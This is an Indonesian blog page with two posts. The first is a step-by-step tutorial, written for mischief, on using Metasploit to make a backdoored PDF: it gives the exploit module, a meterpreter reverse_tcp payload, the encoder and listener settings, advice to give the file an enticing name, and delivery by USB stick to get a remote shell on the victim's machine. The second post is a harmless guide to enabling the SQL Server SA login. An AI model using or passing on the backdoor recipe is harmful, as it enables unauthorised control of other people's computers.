Friday 21 October 2016

Metasploit Hacking Dengan Backdoor PDF






Hay Gaesss kali ini saya akan memberi kalian sedikit info tentang bagaimana cara hacking atau membuat trojan dengan menggunakan Framework yang terdapat pada Sistem Operasi Kali Linux. Nah disini saya menggunakan PDF sebagai Backdoor.

Trojan horse atau Kuda Troya atau yang lebih dikenal sebagai Trojan sendiri merupakan keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang mencurigakan (malicious software/malware) yang dapat merusak sebuah sistem atau jaringan.

Nah tujuan belajar Metasploit Hacking dengan Backdoor PDF adalah agar kalian dapat memunculkan modul, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju. Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya walaupun penyusup sistem berada pada jarak jangkauan yang jauh tetapi dapat mengendalikan komputer target.

Metasploit menyerang dengan cara mengirimkan exploit yang berisi payload yang sudah ditentukan oleh penyusup sistem pada komputer target.

Exploit merupakan software yang berfungsi untuk memanfaatkan kelemahan pada software target(misal web browser), setelah berhasil mengeksploitasinya exploit tersebut memasukkan payload ke dalam memori korban.

Payload merupakan sebuah file executable milik penyusup yang akan di run pada komputer target dengan tujuan dapat mengendalikan komputer tersebut secara remote atau memasang backdoor, trojan, virus, worm, dan lain-lain.

Ok, langsung saja ya.. yang perlu kalian siapkan adalah sebagai berikut:
-  Kali Linux 1.09a (disini saya menggukan Virtual untuk menjalankan Kali Linux 1.09a)
- Adobe Reader 9.0
- Jaringan Internet(pastikan Target dalam satu jaringan)
- Metasploit Framework: Exploit: windows/fileformat/adobe_pdf_embedded_exe dan exploit/multi/handler. Payload: windows/meterpreter/reverse_tcp

Langkah-langkahnya sebagai berikut:

1. Cek Konfigurasi Jaringan

2. Menyiapkan Console msf Metasploit
Ketikkan perintah msfconsole pada terminal dan tampilan metasploitnya seperti gambar dibawah ini. oya biasanya tampilan setiap menjalankan Metasploit akan berubah-ubah.

3. Modul Exploitasi.

Keterangan:
- use windows/fileformat/adobe_pdf_embedded_exe: Tipe Exploit yang digunakan.
- set msfencode x86/shikata_ga_nai: Command untuk meng-encode payload dan keluarnya di/tmp/clickname.exe
- set payload windows/meterpreter/reverse_tcp:  Mengatur payload yang digunakan kesebuah target ketika shell sudah terpasang.
- set lhost: IP Attacker, isi sesuai dengan IP anda.
- set lport: Port listener, saya menggunakan port 445 karena selalu terbuka.
- set filename: Nama file Backdoor, menggunakan nama semenarik mungkin agar target penasaran dan membukanya.
- set infilename: Merupakan file asli PDFnya, dan harus dimasukkan sesuai dengan path atau lokasi dimana file itu berada.
- exploit: Perintah untuk menghasilkan file PDF(backdoor)


4. Mengirimkan File Backdoor yang telah dibuat.
Disini saya menggunakan flashdisk untuk menjebak target dengan cara seolah-olah mengirim file yang dibutuhkan.


5. Modul Exploitasi Lanjutan(handler/listerner)
Proses diatas merupakan perintah menjalankan multi/handler untuk memastikan target terkena jebakan yang telah kita buat.

6. Hasil menjalankan (handler/listerner)

Bingooo!!! Prosesnya cepat, pada komputer target akan muncul box command prompt dalam waktu sekitar 1 detik. Dan kalau sudah muncul console meterpreter selanjutnya terserah kalian mau diapakan. Oya selanjutnya ketik perintah help , didalamnya tersedia command untuk melakukan apa saja yang bisa digunakan pada Desktop siTarget.

Mungkin itu saja yang dapat saya informasikan semoga bermanfaat buat Kakak-kakak semua yang memeliliki kejahilan tinggi hehehe... Terma kasih.

Sumber:
- http://fullstop.solutions/wp-content/uploads/2014/04/trojan.jpg
- https://www.kali.org/wp-content/uploads/2015/02/kali-wallpaper-2015-v1.1.0.png
- http://lycee-douai-biotech.fr/images/pdf-icon.png
- https://blacknetlinux.wordpress.com/2012/10/09/apa-itu-metasploit/

Sunday 2 October 2016

Cara Menambahkan SA(system admin) pada SQL Server

SQL Server merupakan sistem manajemen basis data relasional (RDBMS) dari Microsoft yang dirancang untuk aplikasi dengan arsitektur client server. Terdapat 2 authentication untuk security pada SQL Server yaitu :
- Windows Authentication mode (tanpa menggunakan password)
- SQL Server and Windows Authentication mode

Untuk mengaktifkan akun SA agar bisa membatasi penggunaan database, yuk ikuti langkah-langkah berikut:

1. Pastikan bahwa security yang digunakan adalah SQL Server and Windows Authentication mode
1.1. Klik properties pada username master yang sudah terkoneksi

1.2. Klik menu security pada tab disebelah kiri
1.3. lalu pastikan authenticationnya SQL Server and Windows Authentication mode

1.4. Lalu klik OK

2. Membuat akun sa
2.1. Klik plus(+) pada menu Security di tab Object Explorer untuk membuka folder pada menu security

2.2. Klik plus(+) pada submenu Login kemudian klik kanan pada sa pilih Properties

2.3. Masukkan password dan confirm password

2.4. Lalu pilih database apa saja yang boleh di buka atau dapat di akses. Untuk SA biasanya secara default akan menggunakan master.

 2.5. Jika sudah klik status pada tab select a page lalu pilih enabled pada login

2.6. lalu klik OK

3. Lalu restart SQL Server, kemudian coba cek dengan cara koneksi ulang pada SQL Server
3.1. Klik icon tersebut pada Object Explorer

3.2. Pastikan SQL Server Authentication yang terpilih pada kolom Authentication

3.3. Masukkan Username dan Password
3.4. Lalu klik Connect

Sekian, Silakan dicoba kakak-kakak. Jika ada kesulitan bisa tanya pada kolom comment dibawah yaa.. :D

Sumber gambar :
http://www.matt-thornton.net/wordpress/wp-content/uploads/backup-sql-server-ret.png